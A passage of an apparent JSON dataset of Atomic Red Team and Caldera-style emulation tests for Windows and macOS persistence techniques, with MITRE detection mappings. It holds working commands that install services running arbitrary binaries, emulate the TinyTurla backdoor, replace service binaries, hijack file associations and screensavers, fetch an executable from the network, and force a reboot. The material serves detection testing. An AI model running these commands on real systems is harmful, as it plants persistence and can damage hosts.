\"AtomicTestService_PowerShell\" -BinaryPathName \"#{binary_path}\"\nStart-Service -Name \"AtomicTestService_PowerShell\"\n", + "copy $PathToAtomicsFolder\\T1543.003\\bin\\w64time.dll %systemroot%\\system32\\\nsc create W64Time binPath= \"c:\\Windows\\System32\\svchost.exe -k TimeService\" type= share start=auto\nsc config 
W64Time DisplayName= \"Windows 64 Time\"\nsc description W64Time \"Maintain date and time synch on all clients and services in the network\"\nreg add \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Svchost\" /v TimeService /t REG_MULTI_SZ /d \"W64Time\" /f\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\W64Time\\Parameters\" /v ServiceDll /t REG_EXPAND_SZ /d \"%systemroot%\\system32\\w64time.dll\" /f\nsc start W64Time", + "$s = Get-Service -Name #{host.service.modifiable};\nif ($s.status -ne 'Stopped') { Stop-Service $s };\n$exe = (Get-ItemProperty -Path \"HKLM:\\System\\CurrentControlSet\\Services\\#{host.service.modifiable}\").ImagePath.split()[0];\n$path = (Resolve-Path $exe).Path;\nCopy-Item -Path $path -Destination ($path + \".saved\");\nCopy-Item -Path \"C:\\Windows\\System32\\snmptrap.exe\" -Destination $path\n" + ], + "commands": [ + { + "command": "sc config Fax binPath= \"C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -noexit -c \\\"write-host 'T1543.003 Test'\\\"\"\nsc start Fax\n", + "source": "atomics/T1543.003/T1543.003.yaml", + "name": "Atomic Red Team Test - Create or Modify System Process: Windows Service" + }, + { + "command": "sc.exe create #{service_name} binPath= PathToAtomicsFolder\\T1543.003\\bin\\AtomicService.exe\nsc.exe start #{service_name}\n", + "source": "atomics/T1543.003/T1543.003.yaml", + "name": "Atomic Red Team Test - Create or Modify System Process: Windows Service" + }, + { + "command": "sc.exe create AtomicTestService_CMD binPath= #{binary_path}\nsc.exe start AtomicTestService_CMD\n", + "source": "atomics/T1543.003/T1543.003.yaml", + "name": "Atomic Red Team Test - Create or Modify System Process: Windows Service" + }, + { + "command": "New-Service -Name \"#{service_name}\" -BinaryPathName \"PathToAtomicsFolder\\T1543.003\\bin\\AtomicService.exe\"\nStart-Service -Name \"#{service_name}\"\n", + "source": "atomics/T1543.003/T1543.003.yaml", + "name": "Atomic Red Team Test - Create or Modify System 
Process: Windows Service" + }, + { + "command": "New-Service -Name \"AtomicTestService_PowerShell\" -BinaryPathName \"#{binary_path}\"\nStart-Service -Name \"AtomicTestService_PowerShell\"\n", + "source": "atomics/T1543.003/T1543.003.yaml", + "name": "Atomic Red Team Test - Create or Modify System Process: Windows Service" + }, + { + "command": "copy $PathToAtomicsFolder\\T1543.003\\bin\\w64time.dll %systemroot%\\system32\\\nsc create W64Time binPath= \"c:\\Windows\\System32\\svchost.exe -k TimeService\" type= share start=auto\nsc config W64Time DisplayName= \"Windows 64 Time\"\nsc description W64Time \"Maintain date and time synch on all clients and services in the network\"\nreg add \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Svchost\" /v TimeService /t REG_MULTI_SZ /d \"W64Time\" /f\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\W64Time\\Parameters\" /v ServiceDll /t REG_EXPAND_SZ /d \"%systemroot%\\system32\\w64time.dll\" /f\nsc start W64Time", + "source": "atomics/T1543.003/T1543.003.yaml", + "name": "Atomic Red Team Test - Create or Modify System Process: Windows Service" + }, + { + "command": "$s = Get-Service -Name #{host.service.modifiable};\nif ($s.status -ne 'Stopped') { Stop-Service $s };\n$exe = (Get-ItemProperty -Path \"HKLM:\\System\\CurrentControlSet\\Services\\#{host.service.modifiable}\").ImagePath.split()[0];\n$path = (Resolve-Path $exe).Path;\nCopy-Item -Path $path -Destination ($path + \".saved\");\nCopy-Item -Path \"C:\\Windows\\System32\\snmptrap.exe\" -Destination $path\n", + "source": "data/abilities/persistence/52771610-2322-44cf-816b-a7df42b4c086.yml", + "name": "This is an example technique. snmptrap.exe should be changed in the command\nbelow with the new desired service binary. 
Depending on the value of\nhost.service.modifiable this ability can damage the target system.\n" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1543.003", + "display_name": "Create or Modify System Process: Windows Service", + "atomic_tests": [ + { + "name": "Modify Fax service to run PowerShell", + "auto_generated_guid": "ed366cde-7d12-49df-a833-671904770b9f", + "description": "This test will temporarily modify the service Fax by changing the binPath to PowerShell\nand will then revert the binPath change, restoring Fax to its original state.\nUpon successful execution, cmd will modify the binpath for `Fax` to spawn powershell. Powershell will then spawn.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "command_prompt", + "elevation_required": true, + "command": "sc config Fax binPath= \"C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -noexit -c \\\"write-host 'T1543.003 Test'\\\"\"\nsc start Fax\n", + "cleanup_command": "sc config Fax binPath= \"C:\\WINDOWS\\system32\\fxssvc.exe\" >nul 2>&1" + } + }, + { + "name": "Service Installation CMD", + "auto_generated_guid": "981e2942-e433-44e9-afc1-8c957a1496b6", + "description": "Download an executable from github and start it as a service.\nUpon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which will create and start the service. 
Results will output via stdout.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "binary_path": { + "description": "Name of the service binary, include path.", + "type": "Path", + "default": "PathToAtomicsFolder\\T1543.003\\bin\\AtomicService.exe" + }, + "service_name": { + "description": "Name of the Service", + "type": "String", + "default": "AtomicTestService_CMD" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Service binary must exist on disk at specified location (#{binary_path})\n", + "prereq_command": "if (Test-Path #{binary_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe\" -OutFile \"#{binary_path}\"\n" + } + ], + "executor": { + "name": "command_prompt", + "elevation_required": true, + "command": "sc.exe create #{service_name} binPath= #{binary_path}\nsc.exe start #{service_name}\n", + "cleanup_command": "sc.exe stop #{service_name} >nul 2>&1\nsc.exe delete #{service_name} >nul 2>&1\n" + } + }, + { + "name": "Service Installation PowerShell", + "auto_generated_guid": "491a4af6-a521-4b74-b23b-f7b3f1ee9e77", + "description": "Installs A Local Service via PowerShell.\nUpon successful execution, powershell will download `AtomicService.exe` from github. Powershell will then use `New-Service` and `Start-Service` to start service. 
Results will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "binary_path": { + "description": "Name of the service binary, include path.", + "type": "Path", + "default": "PathToAtomicsFolder\\T1543.003\\bin\\AtomicService.exe" + }, + "service_name": { + "description": "Name of the Service", + "type": "String", + "default": "AtomicTestService_PowerShell" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Service binary must exist on disk at specified location (#{binary_path})\n", + "prereq_command": "if (Test-Path #{binary_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe\" -OutFile \"#{binary_path}\"\n" + } + ], + "executor": { + "name": "powershell", + "elevation_required": true, + "command": "New-Service -Name \"#{service_name}\" -BinaryPathName \"#{binary_path}\"\nStart-Service -Name \"#{service_name}\"\n", + "cleanup_command": "Stop-Service -Name \"#{service_name}\" 2>&1 | Out-Null\ntry {(Get-WmiObject Win32_Service -filter \"name='#{service_name}'\").Delete()}\ncatch {}\n" + } + }, + { + "name": "TinyTurla backdoor service w64time", + "auto_generated_guid": "ef0581fd-528e-4662-87bc-4c2affb86940", + "description": "It's running Dll as service to emulate the tine turla backdoor\n\n[Related Talos Blog](https://blog.talosintelligence.com/2021/09/tinyturla.html)\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "dllfilename": { + "description": "It specifies Dll file to run as service", + "type": "string", + "default": "$PathToAtomicsFolder\\T1543.003\\bin\\w64time.dll" + } + }, + "executor": { + "command": "copy #{dllfilename} %systemroot%\\system32\\\nsc create W64Time binPath= \"c:\\Windows\\System32\\svchost.exe -k TimeService\" type= share 
start=auto\nsc config W64Time DisplayName= \"Windows 64 Time\"\nsc description W64Time \"Maintain date and time synch on all clients and services in the network\"\nreg add \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Svchost\" /v TimeService /t REG_MULTI_SZ /d \"W64Time\" /f\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\W64Time\\Parameters\" /v ServiceDll /t REG_EXPAND_SZ /d \"%systemroot%\\system32\\w64time.dll\" /f\nsc start W64Time", + "cleanup_command": "sc stop W64Time\nsc.exe delete W64Time\ndel %systemroot%\\system32\\w64time.dll\nreg delete \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Svchost\" /v TimeService /f\nreg delete \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\W64Time\\Parameters\" /v ServiceDll /f", + "name": "command_prompt", + "elevation_required": true + } + } + ] + }, + { + "id": "52771610-2322-44cf-816b-a7df42b4c086", + "name": "Replace a service binary with alternate binary", + "description": "This is an example technique. snmptrap.exe should be changed in the command\nbelow with the new desired service binary. 
Depending on the value of\nhost.service.modifiable this ability can damage the target system.\n", + "tactic": "persistence", + "technique": { + "attack_id": "T1543.003", + "name": "Create or Modify System Process: Windows Service" + }, + "platforms": { + "windows": { + "psh": { + "command": "$s = Get-Service -Name #{host.service.modifiable};\nif ($s.status -ne 'Stopped') { Stop-Service $s };\n$exe = (Get-ItemProperty -Path \"HKLM:\\System\\CurrentControlSet\\Services\\#{host.service.modifiable}\").ImagePath.split()[0];\n$path = (Resolve-Path $exe).Path;\nCopy-Item -Path $path -Destination ($path + \".saved\");\nCopy-Item -Path \"C:\\Windows\\System32\\snmptrap.exe\" -Destination $path\n", + "cleanup": "$exe = (Get-ItemProperty -Path \"HKLM:\\System\\CurrentControlSet\\Services\\#{host.service.modifiable}\").ImagePath.split()[0];\n$path = (Resolve-Path $exe).Path;\nIf (Test-Path ($path + \".saved\")) {\n Remove-Item $path;\n Move-Item -Path ($path + \".saved\") -Destination $path\n}\n" + } + } + }, + "requirements": [ + { + "plugins.stockpile.app.requirements.paw_provenance": [ + { + "source": "host.service.modifiable" + } + ] + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service creation", + "description": "A service/daemon was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "service" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service modification", + "description": "A 
service/daemon was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "service" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service modification", + "description": "A service/daemon was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "service" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "process", + "definition": "Information about 
instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": 
"command" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key creation", + "description": "A registry key was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key creation", + "description": "A registry key was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + 
"data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications", + "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ] + ] + }, + { + "technique_id": "T1543.004", + "command_list": [ + "sudo cp #{path_malicious_plist} /Library/LaunchDaemons/com.atomicredteam.plist\nsudo launchctl load -w /Library/LaunchDaemons/com.atomicredteam.plist\n", + "sudo cp $PathToAtomicsFolder/T1543.004/src/atomicredteam_T1543_004.plist /Library/LaunchDaemons/#{plist_filename}\nsudo launchctl load -w /Library/LaunchDaemons/#{plist_filename}\n" + ], + "commands": [ + { + "command": "sudo cp #{path_malicious_plist} /Library/LaunchDaemons/com.atomicredteam.plist\nsudo launchctl load -w /Library/LaunchDaemons/com.atomicredteam.plist\n", + "source": "atomics/T1543.004/T1543.004.yaml", + "name": "Atomic Red Team Test - Create or Modify System Process: Launch Daemon" + }, + { + 
"command": "sudo cp $PathToAtomicsFolder/T1543.004/src/atomicredteam_T1543_004.plist /Library/LaunchDaemons/#{plist_filename}\nsudo launchctl load -w /Library/LaunchDaemons/#{plist_filename}\n", + "source": "atomics/T1543.004/T1543.004.yaml", + "name": "Atomic Red Team Test - Create or Modify System Process: Launch Daemon" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1543.004", + "display_name": "Create or Modify System Process: Launch Daemon", + "atomic_tests": [ + { + "name": "Launch Daemon", + "auto_generated_guid": "03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf", + "description": "Utilize LaunchDaemon to launch `Hello World`\n", + "supported_platforms": [ + "macos" + ], + "input_arguments": { + "plist_filename": { + "description": "filename", + "type": "String", + "default": "com.atomicredteam.plist" + }, + "path_malicious_plist": { + "description": "Name of file to store in cron folder", + "type": "String", + "default": "$PathToAtomicsFolder/T1543.004/src/atomicredteam_T1543_004.plist" + } + }, + "dependency_executor_name": "bash", + "dependencies": [ + { + "description": "The shared library must exist on disk at specified location (#{path_malicious_plist})\n", + "prereq_command": "if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "echo \"The plist file doesn't exist. Check the path and try again.\"; exit 1;\n" + } + ], + "executor": { + "name": "bash", + "elevation_required": true, + "command": "sudo cp #{path_malicious_plist} /Library/LaunchDaemons/#{plist_filename}\nsudo launchctl load -w /Library/LaunchDaemons/#{plist_filename}\n", + "cleanup_command": "sudo launchctl unload /Library/LaunchDaemons/#{plist_filename}\nsudo rm /Library/LaunchDaemons/#{plist_filename}\n" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + 
"Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service creation", + "description": "A service/daemon was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "service" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service modification", + "description": "A service/daemon was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "service" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + 
"collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service modification", + "description": "A service/daemon was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "service" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications", + "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + ] + ] + }, + { + "technique_id": "T1546.001", + "command_list": [ + "assoc #{extension_to_change}=txtfile\n", + "assoc .hta=#{target_extension_handler}\n", + "assoc #{extension_to_change}=#{target_extension_handler}\n" + ], + "commands": [ + { + "command": "assoc #{extension_to_change}=txtfile\n", + "source": "atomics/T1546.001/T1546.001.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: Change Default File Association" + }, + { + "command": "assoc .hta=#{target_extension_handler}\n", + "source": "atomics/T1546.001/T1546.001.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: Change Default File Association" + }, + { + "command": "assoc #{extension_to_change}=#{target_extension_handler}\n", + "source": "atomics/T1546.001/T1546.001.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: Change Default File Association" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1546.001", + "display_name": 
"Event Triggered Execution: Change Default File Association", + "atomic_tests": [ + { + "name": "Change Default File Association", + "auto_generated_guid": "10a08978-2045-4d62-8c42-1957bbbea102", + "description": "Change Default File Association From cmd.exe of hta to notepad.\n\nUpon successful execution, cmd.exe will change the file association of .hta to notepad.exe. \n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "target_extension_handler": { + "description": "txtfile maps to notepad.exe", + "type": "Path", + "default": "txtfile" + }, + "extension_to_change": { + "description": "File Extension To Hijack", + "type": "String", + "default": ".hta" + }, + "original_extension_handler": { + "description": "File Extension To Revert", + "type": "String", + "default": "htafile" + } + }, + "executor": { + "command": "assoc #{extension_to_change}=#{target_extension_handler}\n", + "cleanup_command": "assoc #{extension_to_change}=#{original_extension_handler}\n", + "name": "command_prompt", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + 
{ + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ 
+ "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1546.002", + "command_list": [ + "copy C:\\Windows\\System32\\cmd.exe \"%SystemRoot%\\System32\\evilscreensaver.scr\"\nreg.exe add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v ScreenSaveActive /t REG_SZ /d 1 /f\nreg.exe add \"HKEY_CURRENT_USER\\Control 
Panel\\Desktop\" /v ScreenSaveTimeout /t REG_SZ /d 60 /f\nreg.exe add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f\nreg.exe add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v SCRNSAVE.EXE /t REG_SZ /d \"%SystemRoot%\\System32\\evilscreensaver.scr\" /f\nshutdown /r /t 0\n" + ], + "commands": [ + { + "command": "copy C:\\Windows\\System32\\cmd.exe \"%SystemRoot%\\System32\\evilscreensaver.scr\"\nreg.exe add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v ScreenSaveActive /t REG_SZ /d 1 /f\nreg.exe add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v ScreenSaveTimeout /t REG_SZ /d 60 /f\nreg.exe add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f\nreg.exe add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v SCRNSAVE.EXE /t REG_SZ /d \"%SystemRoot%\\System32\\evilscreensaver.scr\" /f\nshutdown /r /t 0\n", + "source": "atomics/T1546.002/T1546.002.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: Screensaver" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1546.002", + "display_name": "Event Triggered Execution: Screensaver", + "atomic_tests": [ + { + "name": "Set Arbitrary Binary as Screensaver", + "auto_generated_guid": "281201e7-de41-4dc9-b73d-f288938cbb64", + "description": "This test copies a binary into the Windows System32 folder and sets it as the screensaver so it will execute for persistence. 
